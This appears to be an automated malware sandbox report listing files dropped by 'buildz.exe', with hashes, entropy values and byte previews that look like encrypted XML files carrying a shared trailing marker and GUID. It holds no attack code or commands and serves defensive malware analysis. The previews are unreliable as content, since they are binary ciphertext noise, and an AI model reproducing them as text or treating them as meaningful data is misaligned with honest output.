                        Preview:<?xmlNi.?..8.m..2I..y..6....y.7@.>..B.*...9=..Y.E....+.h..&:n.L..$A...^.v...s|x.<.....'..2.B.....@.AZ.G..q.>.BH|.<L`a..U..H.-5..@?.{e%vAf....+..%D9.H...............i9...>`...Z1.b...V.....`.d.X@:?.Q.6.u.#%.>oN..(0.2...e.. <....9.$...T.....>..=H^N.l.E.K.F..L..\....~l.....d.P.;*#...p.Djhv].fa}A....q.D>.d....P..t.z......A.s.C......z/.`...1k.?.N.Vd....C[Y(Ms.....n... n...S^.....`..W.cIu....nIB.{.a.y....\H.Z..4.=...{.h.H...Cs..t`.M...sYm.J>...u.9....X|./v....*..)k.).7K.V#h.Q..j..A..!N...#.>.S..O......`...i$..sH8.g..!.kl..C.d.)s:.3.{7i.s.;...A5.^..@>'iZ.M.....Pte.q.$1..8su...%..aP.4wU.yW....,..~.....(.0Aj...E...y..6.7..da...rJ@.... GH##q...<.'..1......w.+.{......_,....]...S......-..=.J.-:.\.o.ixp*(....)....H.;.?H.NX...c...3.gK...<C....5....,!.y.k...V9...q.}a2$_..zp.Z.T.:.z..w...4:.~._sAO.......[..#E.....,y...s.H.v..umF.[]....P.e.`.....2......W..)...Y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2312
                        Entropy (8bit):7.910102917437556
                        Encrypted:false
                        SSDEEP:48:6PSKoL1G0yLn2QRw0rNcOqwq8F4qBtctizxxk+hUD:WY1G0yL2QRw0B19qY+QxxA
                        MD5:71A05A66E79F9137988EDEFABD57AE0D
                        SHA1:F415F3861C5D56D1FDB2E14F6DD50D97E040D942
                        SHA-256:2781DB68717359DC81E8B35D9962FCFE1BD29B8AAA202BFBD82F4A02DF6122A1
                        SHA-512:EEC7EC4D77E6121FA3DECC055DD4DCE4826A8000539C90384BF6864B77E772419D9B19D48CB3DADFCC97634504C49F311D4DA9749672CA9C3F72C988AE538D90
                        Malicious:false
                        Preview:<?xmlkQ'.....B2.....q...v..H..H1..E..F.,j.Q.1-..N..aJ...9.R.e......../....'.l....#a..........\...b.`.+kq...*2~.N../.......CX=.b=.l..H.%k..<N...5r7.T..@....f>.&...V...T(y.RV...``p..(.Mf....6P.....\.&j........g5 W.......NZy..^...Y..];?.x.).9...z..".b..#:.]....h..^pj.&..:,k....H..A...\..(b.o..>..-.g.....g%ro.....DF."...]h......v..;c...Y...N.n..Q..m..pH@,......\.B@.xIp./$/.....$...>........Z.Y...7..O.c.h%....Iw..D1......)d.Jg...=.YU.q....8}Hr... x.wF.4-y.!...@..@..K.h(.Q.....o.W..../u.......g|.0.~.L9....}.i......j...H....$.n.vQ.`...p.*...h.....L.......5S.A`...2......Z.a.1%3.#.-.$~N.L.......?.<...X....]GZT.wUs$.C...+i.RJ...7)&...A..H<.Z...4..'T.HT(.i....ezf.2%O.g.....w....:1!..6....G.ai]..SWA.....O.E.'.".mH...<.q.2.kE..hT..'..........&.H.V..~4.I.....3.~..'...RV.vk..).....m.F.rys.#.Q...dt.S..zc.o...."....a3.i...,.L...EV..?.<C.~.u\..r.q.5....t...(.....@.my).#1.......S. ....zQ4....S..J{....`.>...Lzi....W&A._.:O..'(v.u...]!.G.L58.^...=}6.Z......c
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1731
                        Entropy (8bit):7.86937665913499
                        Encrypted:false
                        SSDEEP:48:kV7lBWl54zrwCchNd+KSV0NRIrRWlrlkHUD:qUcyzfSVEa8uHA
                        MD5:0E62860660E5A516D6182A4C68470276
                        SHA1:B1BAD639F5CE7A016A4D7213827F6DDF08246A48
                        SHA-256:A24049CE67C97627D48D212DA18A508296EF3340495D9F0A4E2771D27912038B
                        SHA-512:0AB5474D16731636E82B3AF368458F6258E1DB226D255F521AA8C805FC660A907DD6F7237E1386CA7633DD5A0084366D64D058CC9AB7DD33EA9215516AF10EA1
                        Malicious:false
                        Preview:<?xml....-zx..}.G.l.. vm.n)......e..w$.N!...Br(...ZB.r.....}.?pJ.?...9.U.^.._=........KL.K.s.....q."0..8..}..AU..L..-g..cD...#..?...t.x0C..jg...%?Y>.X.F"........f...y....x...rP...d...nS....m...z&9..}..6.,!V8.D...s..B....:....ut...#6H^....yi.....!....`L.2.C.-.........KP..3..n.<..y.N....Q.`..........?....-+|p.(.|-...i......[Y...F0.v.&[..o"......h. ..A`=..ie..N.p....l.Y...Td.o.3...;..^B~.!.Nj..=.............-:.v.P........G@.."R..1>]z.-..],....y'...BOV......'...q.f..A..k...5w....>?..&YG<...40..0T$.)R.+y...........X..-P.9.sZ.....PQ...h.Y...9.!...lU.E..~.+Nc..,.$n[.6..+=..;. d.<q..l+qRd..E.....[kU&.....J.........rC......M3.U.....E.5'6@.8#.....m...~.[w=...*..[p..&........-..\{t...L...........H..@.C.....r.\...ym...h..9..f.........r.s..:.ie....e.J...(R6.............A.....M.8.aUr. ..z..h.0.5....*k.X..c...Y.p...k.4...^....U..[..2. ..d....0..$%?...T.T.qG.S4..$....E.....\.+G.?Y.c....9(&..e.+k._.,.5.:h.r5./..mK.L.F.BB.,.B...B.Y...3..|od..h..lW.-....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):916
                        Entropy (8bit):7.738679810707485
                        Encrypted:false
                        SSDEEP:24:RF0FvfEdtbWcYUdJ0liYkNNkcqQQdZJelG1GbD:RwXEdtulivNLEZJVUD
                        MD5:46EC3AC473DD4FA710686D3729C7BEB2
                        SHA1:8E31B13D68700F2FB8BD3F453FA0BB4B0FD63E31
                        SHA-256:93289E9A3838B5A811565A09E9631B7B602F421792FF433EC4061E2D5C6ADC26
                        SHA-512:5BC97EB3370D037718AFB709261435D6BE94FE2FDEF18BBC64A03D5FF0A25882810036D248FC69DEA603D4C4D08DFDEA64A7797F0EF23E8E1DD5A5A123D1F83C
                        Malicious:false
                        Preview:<?xml.:.eV........r|..b..}...s...D......*]G.XP...'...A..h...+.k...l.S.....,>..|8f(a.`&.M...D.....l..6..XF2.$.u.r]...J..U.[..+I.<...m."".c....Wu....&..Bi ..N..v...O1.%..`.O.....[.....J$.*1m..n....oSY.i?.\..Y.6..d.N.C.na....../..l9.V.$.......$...q5...$..p..v7|..A#r..1$...(}3E.`6....L.....3....UP....\[..v....3..4.......a...........nx.&...............`a"e......@,/D.0..=..ps......0.....K....q.%....7PC.Z..KN.g..\7Z.b....;.25*.m.....<...r.Q..E.2....Le....E...a.*..=D.i..h.=;!....(....h3..K.4.....Bp1.jEqs.4=.p.L..Bnj.....n88.|..I?...0..R..-....Gx. .........Wn..'6op$..........jqj.1....n...(q.2..........f'..B..tS<S2.Z&9..{.h...Xe..4\..d.L..so....7................9...~......>s.!Q..A-...xvh[]mK.j....[i...d=E.$.D.$'...l.....[.?...k...z3l.O.)c.>.\...0..A..$.-.:..CR.WY%..3...a.`:'.x.b...x.t@..9.^.!.JAL.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):887
                        Entropy (8bit):7.77579336982838
                        Encrypted:false
                        SSDEEP:24:GWXhryEomXrrx9r/goyyCFVw6sepBB9UKpvGbD:G4Xr19L7CFVdBXvUD
                        MD5:8E617F6D38FA8FF89BC388A3C368C2AC
                        SHA1:F0CF99C03D13FF19B6393A029CB4AF1469B39207
                        SHA-256:40FD84EAA0E995999DA167BD2E64DBBF44738B5C9511F6112A8470B3E302A0E2
                        SHA-512:970768FEE0BE41729D40BD405772E49F802E085A78A9F556C139E0BF8A6FE7858013FA8E5D59D908A2E744E2943A45C8E0ECB2C3C225D6A726614478F62E8094
                        Malicious:false
                        Preview:<?xml.q.a_ .Y...h1k.:e>M...HId..X.\.q.=i.=..'...{..6.s'.te...+.....mU~....C.Cf..-..}[.k.K..>..A.2..hx.......:...Z.<......I..!I.].&..........?\...O..c.u.....Df7....Iq..?.w~.}'A..U=...l2b.+....W.0&.b...p.i.. {V.[.A.....Yk%.....f.y.@..U.......#..3....y....<..[.Oz ..|......3..5.8v(. ..@X(*..Py.....[.?.......d..A..j..........+...z..d.Q..X...?...[.|{..(..;h.O}.(M.j\+....,.1.>.q6..W.....E...#.8...T..s.Bw~9.Z3...|..%.R..,......GF......xz`....8.c..v.|....+)t........m.....4h...S.x..bS..<%I....4O8^....|&....X......=..4@..'.!..rks..u.d.c........$.p.J.e-W.......}a.$.......E.Zg.0..$.....o..a...k..St.pLp.........r...2...Ikr..u]..2..f....Oz.^n.3m6..0...B..2..O^./.7c0S/l.Ye...ms.<G:N.<8gN..r...[.&.%.mp.v]m.6f.)..<.VY.'5d.;`...D..[..p.&..._.....l..!..t,$U...'....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):975
                        Entropy (8bit):7.803831977438445
                        Encrypted:false
                        SSDEEP:12:49SXGyiJvpg6bG5ZMAT+aSt0mEw0ZYnTpn3GmDE18jaIjKtjPv8mLTVGS+jU6lXX:4wXepgfoAT+Trg+DCT1RDWV4tGbD
                        MD5:E8B0F84E63FFEA7DF47874D8B73BCDC5
                        SHA1:1010ECE89D7B2AE51F680BE9E74889E3E81C9564
                        SHA-256:58D49FF857F7AAE8BAA8B9C171807DD63083CF15CA312B10679AA87406B70238
                        SHA-512:FBEE961F6187A2CD487DB7C8F09427C40547D309F88533951560DAFDF5946E136078A78E0AF811388F9968BCC8276CA8BD7759C9EBAF0A759C012F4BD29B74B8
                        Malicious:false
                        Preview:<?xml.VQ-..R.X.[td.".D.O[`..8FG...ZP.,......%..xX..U#&4X...V.......p@.....e ...k.NT..V.Z_.......7F.....[HlQa`..,..ej]....Y..<..GVdZ..D.....|.C:..A=u....z.....W..E."/@yFx.....x....|%%{....}.<E....r.*^}..%..)C.8.zG.YR.o.....(...r.....N..R...>....?..n....Z.j.7.....%....*...S.R....n.ru'y..H.../....b.~&F.N.......#.]q(..(..JB.......Be....!..\.Rd.Z...L...l.....w..I.,.c.>...e.:...9.~.......9...P=G..mn.JJ"...I'Y..?.y../.u...2)t<....E.DSqa...r...V..v.....c.~[.......XP9x.gB....._.1...L.to)..2mNP.y_D9A.?..z...K...m.O....w.2}.........P.....Za..sp..[.Z..v.U]v......K..;d..%../x%..........s..)...!...'..n....5....G._....E. ..l.=.T>...U..i.......Sr..%h...T2g..........i.$G..%...N.^..`....x.k..s$;..i......d...h....e....}x....=.@f.....P.(P..9..!.$G..|......9.a.(W.zz8W..y.j...AR.+.T.H..?.Kr.e1.%....S...Z..@..u....i....3...v...g.sR..B.`|.b....f...Nd.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.727921368641207
                        Encrypted:false
                        SSDEEP:12:V9Bje58gbSrQliAtJWBQjrbm9sARKv12QEZD4Ri0D0/jFoXYNwXiHclsl1V/26GX:NgbSrOjfmyF9uGvYNgiHclmGbD
                        MD5:C86CB00E7D39A1CF31BEC822CC9F50BF
                        SHA1:414BE1E7E7C371B68A803EC674F136520D8EB3CA
                        SHA-256:1BCC21E7F62B283687FE5DA85F847E1C93CB038DFDEBB21FC96F158F3061246E
                        SHA-512:70E428253230E88C10D1278C9067BF19CDDA13E6A34FFDC833F5EE791E304F6C9025881A3FC62E471B9F4BF2AEEF76F7E8D5A3D6B623145246179B141D7EE197
                        Malicious:false
                        Preview:<?xml.B._.G..c.l.....L....nq.5r.Ir..Y....(my>.Wm..k.V....."T....=..<..>2....?.<6..|.T*...H.U...h..c.Z8...(..}0.N.\K)...._..c.Q.-K.@..d..%.... (.....K|..i.r>..n.N=9.:....TH.....z'?/)..e........@....,..]..s.~f..I..I...M...@,..6&.&)...U.9RF.-..7..1.!.Y.....%.%S..a)....3;."...*InQMy.&.{o%...w.8,c.e.d..IW.....r.Xd.%]M....+&zs.....j$=.~/..:t.}.2B....~..:..h......e}.....C.....?.]...;y.1..<..n.....x/..........."......V.U.r..`'.............K+e.........x.@u.gDO....>...b......O:..8....}......i1KV.ph..G...=.(ST.[...D..y......n.Jqxr/..8*...]..#..r..a.7...<.,Du.].a......5%..q.W..3..Z.C.s.!.......... ...=..9K..h..pEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1031
                        Entropy (8bit):7.778280924717009
                        Encrypted:false
                        SSDEEP:24:fVNlqpXTFM9O3shXc3+JhSpy59F1jxAgeBIO4fa9GbD:ftqluOchX8+JhSEnF11AgrfSUD
                        MD5:F362C1A5CDCF352E4EAB8FB1408671DB
                        SHA1:C3040504785DA7CB16AB33E220B367381E231512
                        SHA-256:00AFBB6EDAEC6A21DB4E1F0A689C2715809DAFC47171DE90BB18FD6055AE132E
                        SHA-512:376E352F9534A2F6A51AAC75FC2DE9E122347D4A72513B6EB971ED5322ED7D45857DFB919D6DFC0970BD1C8BE72CD6900E7F9A3A444C2A627E8DDE38200221AF
                        Malicious:false
                        Preview:<?xmlB... k.\.x.....t.......GDf$eNb..Q=~..P....EmN=.}.G..b9!........!........F.].7...+.f.r?...9.C...C4...BlY......4...T.Q. .%..@.(./%.....vC.j...0.aX(.......#.s.w~.>..q....$.L.6J..>.....F.k.#G......@}..cw..0UP.........C.R:..........28....H...^.X.vvPU......k..E,C9.......J.\..?\......}......5..0..q...#.<...f.\..|...7..........hpW5..p..t...PX.y....?.L.9.#..02.W....u{..n4u...x.....cL.y<......JYu../.....7B..8.9.DK`......`.......[6.}T.t.wy.S&S.=B..+.....&x.IE....0Lj.L.....9xOr.l.....Gd....$.(....y.!$EM..Z&...r.H..h".....$.H..tLBCg...<...%u.L-.Ic@...H.Ft....D...c.B.Zd.i...H.zZ..AQ.hbM...a@......q..Q... .m&.Y..c...wT.9~.u...w..?.0ff....Z..../.ts..5..U....0.D....^@s.qd-...e=~!i.i--JEK.J.i"....G..o.>{Y....T.!n.t..,Se...}...Y...E.#4......>...p.p..S0ZQ7.+.Jb.G.#4.n.....DW..wu.l26w...;...K...0..T.2.j$?.)von..}.6.g.'..c..8..O#...tI..wQT+'...:..N3.dz...r(g.Q...O..Z.{.;.*YS...j.P......P..d..6;8..-...u..tS.F...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1143
                        Entropy (8bit):7.819751321638684
                        Encrypted:false
                        SSDEEP:24:cLLEJwAQGNytOv1lDrYwQEnMURoZ7P6fdY6tIlGbD:CoWW9v1VrRQExoZ70dYOIlUD
                        MD5:3CB79C24FA38DC8D2A379DCECF0B98A1
                        SHA1:2D419851980DAB055C8452A5414A3D9811236C77
                        SHA-256:93D1599D069A721F22B9484D797FD23BE0F4D0F2CCA95CE93B11C3C13229662E
                        SHA-512:6A7539C668EF907B466B57033EF436FCA0FB29AA7D609D53A97D85AB1F3BF035BDEA9A312411D64687C70C0F3A2863D791F83B9C59EB145E7DCB707B13CEF9A2
                        Malicious:false
                        Preview:<?xml...C.....t..X.P.V_..03L........#.ue.2....|.yl.;........4...G.f:)V.v.[.Z.@......v.RG^......F.E...X....dCW+..d.....V..4..|\..x...t..ST.......9.......T.....M....'r,...P*.0$.7z...s.....%.]0......H.&..H....G.>..B......I..MtS..H..0..}..w.z.....2[n.2.S.U%....J......Mdq.Z.c.A.....^..C...^.+cr.:`:..k^)k4.He..JKSL..).B...]|.EF...v...b...p.H...o=..".L<.K.Wk.g...nT../..}..v8..{<.M..9..|...7.I..#oE..q.rU..uD.[_......X.d(.....%...E.....q...I..5..R........]qn..k.~.a.D......D..K.9;....F..P.'..F..,W...A....e.<ba.E@......m.3."8...;..n...H....IZ..wy@.0.$..v..".aa_..8.5...M.3h.j.#..E...3...V..../.M..w.X.r.......!..X..b...V.>!..^.8E.M.N...2........K..a...$...tw...L....i.@.....!....Dx...Yd...... x...../.._..p.%.....9..ce...VU......<.....^a..q....maq.&/.....%..).BR.....hr....R.l...Fu.......f.V.T.b..9.Dk0......U@....D.^w&..$.5T(..S...c/n8Z..^......C*+.........m..u....p....r.FOm.......s..r).M.Msls".Q.ol8(....i.0mE-{...C..+....{Yw%iad..v.gNj...WJy5...#... B`D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1503
                        Entropy (8bit):7.869025601366152
                        Encrypted:false
                        SSDEEP:24:lwfqzWPl/dwqRgk9U3cY1pBWs+sf4IYfqx8yT3wl9/B7/CMtUcGY7QGbD:lwfqzkdw4gk9GBPgs+Q4Imqx8swfJ7/1
                        MD5:A3B2BA81693749BB7BD883ADDC6F7ED8
                        SHA1:9CC95AC9A23C6A2267F9F94309DF56E205439C2E
                        SHA-256:E582934E50010C1E57D130E9540469A40755827C46C4D14CA64F63CE2FAB68C5
                        SHA-512:1367D626D2164C8734C1DD77B4C1C794A027B0A4A21E4DC34FA0A84D76453B72F2EFDED180DCFACCF409C131A34B92618DF278175DF935BEA8C49A5CBC518067
                        Malicious:false
                        Preview:<?xml'.F....u.-..{=..\...h...g7..'...}..(%..~...Bq.{w..."H.n....o.....T.J<o..3.......2.A...EZ.9A...ci......q....A...a.5...f...7q|^...&{....[y..7...|..%]...[..^..x...yRx^=^].....s...p.?...h...]:.W..&.C....e....q./...;..DZ..%P[.~.n.9.EdR..6<...9V,...p ..8Z......^FOo....i*9.....>.....%A=U"..3r2....o..[.;.U.u.>..z[-....H.....D._C...0r.ffq]*.....]..Q....v...A.......;.0BU.a.ME.$...B.&..............]..r.../...)...y..h4...".E.t....V..$.w.m#.........J....i.,osr..O...(.y..e...R..8.GA[.L..*...y1...P..'.=....@Aqo.1..#s.9....V.^.W....x.y..._..Pd-...8..D_.Zv.....%.Y.Q..>....O.MP.z.^..2.a.%..F...J..m)....J..H....E*..$..U..D.\....f.L..';.yy.Gz..0.s..B@......._b.jK?.-.eq@..+.. a...v.....U#_..:...SQ..z...Nh....sQi..n\mV.{1[.a..7!..%=.C`Y4..&.q....Gl.a.......P.x..T.W..S..O...}.t+....M!....E...^.bX.z...!,..i..... .\...........oh).;.`.S.qT ....-.........-7g+.rk*.......N.EA=s.1...,.E..m@.xF.E.q...B18W...T...d...>>.Xf...H4..t.@...e9@..^....d.....|~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1036
                        Entropy (8bit):7.761349143261315
                        Encrypted:false
                        SSDEEP:24:3LuoxHsIrG0AKBxO0akt1xNXjE9/+xUxn1YuXIGbD:7NH45KBE0ak3xNXQp+xKnNIUD
                        MD5:5A25FBF8B436BF5C44B727E2BC984691
                        SHA1:CF8BBC46D2FCB78EE3A8FD01AD442C2FD27F6943
                        SHA-256:FA895B1BABA33F2D088885BEC019B8503374C821362E75C4D4AE372CD7735B4E
                        SHA-512:3CB3857C67511EE3ACEDDCEBFD9D3EBDF8F9A36F9D62EFABD6782E01C7CB23CDAF6CFBAE6D8898B782D2F50C3611AA17ABFFBF0B9DEA40DF3F04741344651798
                        Malicious:false
                        Preview:<?xml..u.h^P... {x...1..Q>.p.....Xbt...U...#.N."..h.. .O.mM...4....l..u4....URiE..v..I`9U...Taq........9..K..a-...........(.._..1..z......G...#....._....5....c1{C.F.W.........W.`.......I`..'l4*......$".#..i. ..T_b...n.....=_8...i.S.A ;..v.[.......iD. ..-z...I..P.I......N.....6o...r.O...o%.Z..1..1.p.:!.u..o.m...Ce.Ud=8.W..n.&?.?...Q...M'E...qU@..~.T8....{..Z^..4.'BM.O..(Z..2N...t.sG.G.g...d......M.....5.\..F).M.3......B.4%....&.....+.H6.....R...../.?>:......:.D...<......(2.\..Q...lH.c.Y4....|cm#.......q..~{..82..f^G.eT.J.NN..I...n^.{......G4...n .V..c...de..}...:#.!......q.1...C.....,5...U.TY..]..Ug:..G.SUg..p~zC.]....D..G.e......I?(....h.1.Y......."*.p}v..(.;\Z...C$..R..hu.I.T.,...@.p......%n.l.a.=[.6...XD....$.....,4.[/.A..c...{...|c.t>LxO...>%...H. .......a.,....E9...g.P.YMV....E,..-I....U..P..n&l:..........qq`9.Bdv8.0>4l...2........S....h...%.B9..RM...@....i."..rE...}O..;...J.('.k.-h.UEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{3
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):934
                        Entropy (8bit):7.75654979796491
                        Encrypted:false
                        SSDEEP:24:j6Dlez2FSotxdkvkfdEtqiuyPgyDycscDiHaWGbD:j6Ds2F3rJd+Rokycs2DWUD
                        MD5:4EB64084058FAB3FF77D90F9B9EEA9C1
                        SHA1:F409355CAC60B42373CD3C3F4C1206E8FE7D7E26
                        SHA-256:164C4EBCD6670FFA62D1C73417CC08E07D1FD96D442A3ABBB5E8FECE64762289
                        SHA-512:60F7B6D9D0F6F7E523BD09A6B1C966340265942B44AE5770C9637054851D6AD23B55F6D5DB5A72724B75432B17AB2205DA8CD080C86904182C8A0FD42A89771B
                        Malicious:false
                        Preview:<?xml..Bx.7.&?.No+.f...~`...!N.43.....M;.RU._.[0\..RhZ.ws.4..+..K....0)".C... 1c.)..A..%..=..F.....x..RV/^..._.Q....m..oY.!..8..*.FY.d=.K..eH.i+..}.....j...../G.V...m....{.sD.&...k...p.i/.?..'..'.ubw..-7(.V..kTg..p;%.=....ej...d%..-..\w....qj..E...[vS..=`..B...X..X.c=............j5..,]...........z.m<Y.1..d..y._poNj..UXC4^A..W....3/....J8.;..g...lw...l^. .N....6]...b..?......0W.9....d\.8.../.~y;| k(..L.{...%q^..!..P.7Y|c..Z..GRK.^... .U.,+Ad<..W.7 ..vg5.b:..r..\.H......e%rXQ~...s...v........W..#...$..8..N.mK.!m 9kH.P"..\....A.fy.W....:.0.q8.I..xrR..HHv.<V\...M..Fh<~q...;..};.MY...x>......gM..>mX).xh...^+1.K....+zRO.E..I.F...r.(1F].D..IB...k...r...]..g^.O#O..w.:a.u..I..j..t.......[.u...(.^$G...b.$C..r.Q.u..7o\.X...g.-...$S..&t...ugO{f...8...Db...p...='.'.FG.. .Q.d..do...d.Z0Y..C.6..~m.M...YM.:..H.'...k..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):723
                        Entropy (8bit):7.634349784706643
                        Encrypted:false
                        SSDEEP:12:keyQJansHSiIaLiz+hZqZQpQTwPF5oYljz/r+352OnPhvoE93ALvdAMceDzy26GX:PdEsH1IxzQEQpQsFj/POPhQE9wL1ArOB
                        MD5:7992774448D851507387D7B70BF435D7
                        SHA1:DDC367664CECFBFFBED7F8EB7BF77AADB110049D
                        SHA-256:38BE384E9D43C3A980EA9AB21CCE5ECEED32B7EA06A0984C2FFE4E8148EEBC96
                        SHA-512:4AD5672AF4245B24AB661E39E837DB3E6AF97E9993A6970239797355803FAAE5968AA3D5A066E925AFE52AD2EA9A538611E6CDC259617184414F0EF95910AB83
                        Malicious:false
                        Preview:<?xml.4........N...w.......<Y.....#.......b*....((;..KfO.x.=?>I........%..?.`..xiG....-.D.D...)O..N)e.w.qK.....T.....j |...htlv.8.X....-lQ..n...Gy.........X.?i.U..-.6..~...........g...d...3...5..H.k.5.*...m..2..............'f.N~.&x..h^...a@B...5.b.~..$.....98eT.9.....z..M.~K.D^.q...Fo.'T.x...z.g.........m..#.}......b(2.8........b...x..P....M/.W..-..*@.#-....N...2X..........O..e.o.L..k#...f../e=T.4..<..Cqv...X.b.V..(ka.Y.......>TcgD7...*s.a..z.x..5.au.8....1....8..(*....gWA..g....X..)];.8.Z.}.."E .kd..b...F.H.z7....Q....._Jn^S.2...T..zO.8.u.......O..n9....Q*.F<9../S.....K)..C.K]..)..p.E.{du..VYt..L....f..U....l..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1089
                        Entropy (8bit):7.781749049510133
                        Encrypted:false
                        SSDEEP:24:wZmVTW26Ka8B06tIVfW8kzkTZEP78PeiD9/02nSLd3IGbD:Fq26Ka8B/to7xTZO78Pe4Rtn2OUD
                        MD5:C5D2859C2F421FAD784BAD8C9D6FE9D5
                        SHA1:EE6E734FAD1B49B3681164D87BCFCA901BB9BD10
                        SHA-256:57B00FA7673B2CDA72144FE03958C5DF25E1D9AA20AA66F03BBE7E030BC367B9
                        SHA-512:B71A63316A97A11BABC652C85CF50109A458E64456A114F537D46B8DDA1753BF02B24AA5B4DFFB334C120F299DE4D6AD56D45842CE295C54BE4F6177C3C4C050
                        Malicious:false
                        Preview:<?xml.iT..q..^.@......J+4.~..J. .b.(;..tO}.6.?.....3...5..#.."Cls......v,r.L..y..LJ...].S..T....e....*.M.$"..F......6.W..d5.8T0(Ma5g..I.OZa...8gi...N.A..).`C....Sm.(.<..fQ......9......*R...ze.^...V.XU....&..Tv..m.&........+GS6'.0.:....B...xY..o.`w..F..9..N.Y.v.zg....B..Z.x.....(mIl....i.. .X..gA.%-...^...T`@..XQ..9J).K.....f)..y..obn/....3;..Do.S..ZE.9.=.,.c.......!#..[.%...vFF..&/.......P...U`.....F56....@I....6?.......7'a.3<..*Q.d.g+Gq<.H.4..F.y..{..?n....B....@.....: .|..TeY.<..Y...a)..4w.3T ...U.v9.I...a6..9.]o.^.eK.?6...b*U.RF...a...oM...>......^..$!|.....-v.d.X.....Y.L*Cz...........^S.M..f.. ...!...hx.(;.a........[..Z.{.._.s.........8t3..=$!.m.%...5....}.x...$...Q.7..*...0......r.`zV.J.J..?..6......'.fv...=h..sS...B.O...>.D.......HU..._.7..I.QE........Z.......f.......M{RVI...kB...$1...f.h.D92.%..l.H|y......~.n..?.[.}..7.k<8E...F.#.}..;..l....3q.8.YrH..iE...U...-.$.fy..y.....3....M...p...........%./).5....&.Q'......\...T.k.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1049
                        Entropy (8bit):7.785573933757521
                        Encrypted:false
                        SSDEEP:24:5/P4+UUP9sRPXu3bx7ff+SOtihVMyUlbAH21h/cF0aASfKvdpDN7zUGbD:51UUP9sRPurFJmihV69AW1VvxSfKvdIA
                        MD5:4786335893AE6EE86F05A01DBB351044
                        SHA1:E694508C3A932AA1A2B503BAB944F596017595CC
                        SHA-256:13196DEEE7E0374B0CA9E07B756794BDAECE4AA5ECE6AAAD657DEF8238E0396B
                        SHA-512:2A4292C29276166B0A55886382792B17B0C45409FDF5F92FABDC7221BE17ABEF9EE324CB1EE338FA8427EBEA03913B16D084B15DD8807F01E939BD8770AD5571
                        Malicious:false
                        Preview:<?xmlTCA...w.\.NN...mwN+Z.-*'.B.7=&..........C...B\o...*.u.;'f...V0...S8.S.....%..5.M.G......1. .v!..]DU}..-Pm...A...|.e..t+.......zP.>.b.7..z...^.....&+0sn.#....ZW..|.....4V......D.._....|.....G...^3..5.!...%^.$5.(..w.u....j....O.9F..Dba...V..K.#..G.W.=;..N./rY.s....W.*.P.....V.t...=.+Vz....w.KI.-.W..d>0...J.=.#.}.k....:...G..'.&.0.....QM.p.j...&..F..IR...^....Y.Q..02.2..}.%G.].].uo....Y...W...R....C..-M&j| .6...W.t....@. ..iV.a.;..)Zk....+.t...CV.J.M9.........-$.:.:...,JE.B..F.0K.A.%........U...*j..Y.|............M.(....F&.U...U.DcJ....n.........zW...a.wi.../.&+...b..O.S.....xo.?....&...sW.a..u..b;......9...p...ZE.K.g..X..e...Q.9.....Z.D.*5...8....Q..W.H...4..T....o.....ho....fj..Qlz.(N...k...?...Z..q......h.T...-.....^{.G}?....R..L./....).....;73\C...k...Ao1..u}...?.+.g..R.d..v..Nk.....V..KCs...%+Tt5.......o..j>Vw.y..U.v.p..v.h=8..r..X./S.i.}.%.C:-c..........A.x.R<ly...5.6{m..8.N?.2..z..{. ...yf..x...z%....).EdRvSqD59xL4qFRlN46qLGl69IpLP
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.738109070054741
                        Encrypted:false
                        SSDEEP:12:YfUgijeI0TnnRtg9EVtW3l+B2gnYsdT32OIYxLHhzqGQkS6FHGW26Gcii9a:Y8+IKRSeVtucwcdT33LHhzlQ76Y0GbD
                        MD5:A0BD42EAC0132F298592360EDC7F0F42
                        SHA1:9AAA056CF5755F9D50273D279A501DB36EFA1779
                        SHA-256:7E8048ABECEBE51E8DE64F95A56439E28B1D2FC6F744A3148A2C9FF7CE92D864
                        SHA-512:615421986966F7F531C37694119BC5F925EF01A1B259A36EE3D7A027B9D4B61C9063E5EB6C10ECFD0C5574B2545342D41E68C69E07DE3738EB08DCECA15D6644
                        Malicious:false
